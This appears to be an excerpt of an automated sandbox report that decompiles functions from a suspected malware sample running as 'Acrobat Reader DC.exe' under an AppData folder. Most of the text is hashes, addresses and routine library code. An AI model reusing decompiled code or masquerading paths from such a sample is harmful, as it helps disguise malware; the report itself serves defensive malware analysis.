				 *((intOrPtr*)(_t39 + 0xc)) =  *((intOrPtr*)(_t39 + 0xc)) + 8;
				 *_a8 = (((_v8 & 0x000000ff) << 0x00000008 | _v7 & 0x000000ff) << 0x00000008 | _v6 & 0x000000ff) << 0x00000008 | _v5 & 0x000000ff;
				_v8 = 0;
				_t21 = E00414D30( &_v12, "EA06");
				asm("sbb eax, eax");
				return  ~( ~_t21);
			}










                                  0x004321ab
                                  0x004321b2
                                  0x004321d7
                                  0x004321b4
                                  0x004321c1
                                  0x004321c6
                                  0x004321eb
                                  0x00432205
                                  0x00432210
                                  0x00432214
                                  0x0043221e
                                  0x00432226

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_memmove
                                  • String ID: EA06
                                  • API String ID: 1988441806-3962188686
                                  • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                  • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                  • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                  • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00442BB4(void* __ebx, void* __fp0, intOrPtr* _a4, char _a8) {
				signed int _t7;
				void* _t12;
				signed int* _t17;
				intOrPtr _t19;
				void* _t21;
				intOrPtr* _t22;

				_t1 =  &_a8; // 0x442c75
				_t7 =  *_t1 & 0x0000ffff;
				_t22 = _a4;
				_t20 = _t22 + 8;
				_t17 = _t22 + 8;
				_t19 = 0x11;
				do {
					_t7 = 1 - _t7 * 0x53a9b4fb;
					 *_t17 = _t7;
					_t17 =  &(_t17[1]);
					_t19 = _t19 - 1;
					_t25 = _t19;
				} while (_t19 != 0);
				 *_t22 = _t19;
				 *((intOrPtr*)(_t22 + 4)) = 0xa;
				E00410E60(_t22 + 0x4c, _t20, 0x44);
				E00410E60(_t22 + 0x90, _t20, 0x44);
				_t21 = 9;
				do {
					_t12 = E00431EC8(_t25, __fp0, _t22);
					st0 = __fp0;
					_t21 = _t21 - 1;
				} while (_t21 != 0);
				return _t12;
			}









                                  0x00442bb7
                                  0x00442bb7
                                  0x00442bbc
                                  0x00442bc0
                                  0x00442bc3
                                  0x00442bc5
                                  0x00442bd4
                                  0x00442be1
                                  0x00442be3
                                  0x00442be5
                                  0x00442be8
                                  0x00442be8
                                  0x00442be8
                                  0x00442bf2
                                  0x00442bf4
                                  0x00442bfb
                                  0x00442c0a
                                  0x00442c12
                                  0x00442c18
                                  0x00442c19
                                  0x00442c1e
                                  0x00442c20
                                  0x00442c20
                                  0x00442c26

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: u,D
                                  • API String ID: 4104443479-3858472334
                                  • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                  • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                  • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                  • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044CDE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044CDE9(void* __eflags, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr* _t26;
				intOrPtr* _t35;
				intOrPtr* _t36;

				_t26 = _a12;
				_t36 = _a8;
				_t35 = _a4;
				E004013C0( *(_t35 + 4) +  *((intOrPtr*)(_t26 + 4)), _t36, __eflags);
				E00410E60( *_t36,  *_t35,  *(_t35 + 4) +  *(_t35 + 4));
				E00410E60( *_t36 +  *(_t35 + 4) * 2,  *_t26,  *((intOrPtr*)(_t26 + 4)) + 1 +  *((intOrPtr*)(_t26 + 4)) + 1);
				 *((intOrPtr*)(_t36 + 4)) =  *(_t35 + 4) +  *((intOrPtr*)(_t26 + 4));
				return _t36;
			}






                                  0x0044cded
                                  0x0044cdf1
                                  0x0044cdf5
                                  0x0044ce00
                                  0x0044ce11
                                  0x0044ce29
                                  0x0044ce38
                                  0x0044ce40

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: Error:
                                  • API String ID: 4104443479-232661952
                                  • Opcode ID: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                  • Instruction ID: e6e9f2aa443a554b8bda50df2a041f2c42dbd20d32390c21629c974d0e28b4a3
                                  • Opcode Fuzzy Hash: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                  • Instruction Fuzzy Hash: 2101EFB6200115ABC704DF49D981D6AF7A9FF88710708855AF819CB302D774FD20CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00442651(char _a4) {
				void** _t10;

				_t1 =  &_a4; // 0x426561
				_t10 =  *_t1;
				InternetCloseHandle(_t10[1]);
				InternetCloseHandle( *_t10);
				 *_t10 = 0;
				_t10[1] = 0;
				return E004319AC( &(_t10[0x35]), 0x2710);
			}




                                  0x00442655
                                  0x00442655
                                  0x00442663
                                  0x00442668
                                  0x0044266a
                                  0x00442670
                                  0x0044268b

                                  APIs
                                  • InternetCloseHandle.WININET(?), ref: 00442663
                                  • InternetCloseHandle.WININET ref: 00442668
                                    • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                  • String ID: aeB
                                  • API String ID: 857135153-906807131
                                  • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                  • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                  • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                  • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00433244(intOrPtr _a4, intOrPtr _a8, char _a12) {
				void* _t8;
				void* _t10;
				intOrPtr _t13;
				signed int _t14;

				_t1 =  &_a12; // 0x425e09
				_t14 =  *_t1;
				_t13 = _a4;
				if(_t14 != 0) {
					_t10 = E00412FBA(_t13, _a8, _t14 - 1);
					 *((short*)(_t13 + _t14 * 2 - 2)) = 0;
					return _t10;
				}
				return _t8;
			}







                                  0x00433248
                                  0x00433248
                                  0x0043324c
                                  0x00433251
                                  0x0043325c
                                  0x00433266
                                  0x00000000
                                  0x00433266
                                  0x0043326e

                                  APIs
                                  Strings
                                  • ^B, xrefs: 00433248
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 0043324B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcsncpy
                                  • String ID: ^B$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 1735881322-2741327645
                                  • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                  • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                  • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                  • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00431E1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00431E1F(WCHAR* _a4) {
				short _v528;

				GetTempPathW(0x104,  &_v528);
				return GetTempFileNameW( &_v528, L"aut", 0, _a4);
			}




                                  0x00431e34
                                  0x00431e55

                                  APIs
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Temp$FileNamePath
                                  • String ID: aut
                                  • API String ID: 3285503233-3010740371
                                  • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                  • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                  • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                  • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%